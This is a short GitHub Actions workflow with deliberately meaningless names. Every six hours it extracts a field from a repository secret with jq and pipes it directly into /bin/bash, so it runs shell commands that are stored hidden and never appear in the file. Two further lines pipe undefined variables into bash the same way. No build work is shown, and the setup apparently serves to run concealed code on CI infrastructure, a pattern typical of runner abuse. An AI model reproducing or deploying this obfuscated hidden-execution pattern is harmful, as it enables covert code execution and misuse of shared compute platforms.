name: huamanlou6758
on:
  workflow_dispatch:
  schedule:
    - cron: '27 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huamanlou6758
        env:
          c30: ${{ secrets.c30 }}
        run: |
          echo $c30 | jq -r .owbu93880 | /bin/bash
          echo $jucvf55 | jq -r .k90 | /bin/bash
          echo $so61851 | jq -r .mu01903 | /bin/bash

